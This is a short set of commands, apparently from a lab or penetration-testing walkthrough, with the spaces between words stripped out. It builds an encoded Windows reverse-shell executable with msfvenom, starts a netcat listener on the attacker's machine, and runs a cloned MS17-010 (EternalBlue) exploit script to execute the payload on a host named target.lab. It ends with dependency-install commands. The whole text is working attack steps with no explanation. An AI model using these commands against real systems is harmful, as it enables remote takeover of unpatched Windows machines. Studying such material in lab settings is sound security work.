msfvenom-pwindows/shell_reverse_tcp-fexe-oasuka.exe \-a x86-ex86/shikata_ga_naiLHOST=192.168.100.1LPORT=31337# run nc from attackernc-lvp31337# exploiting the vulnerabilitygitclonehttps://github.com/helviojunior/MS17-010cdMS17-010pythonsend_and_execute.pytarget.labasuka.exe# In case the dependency is missingwgethttps://bootstrap.pypa.io/pip/2.7/get-pip.pypython2get-pip.pypip2installimpacket==0.9.22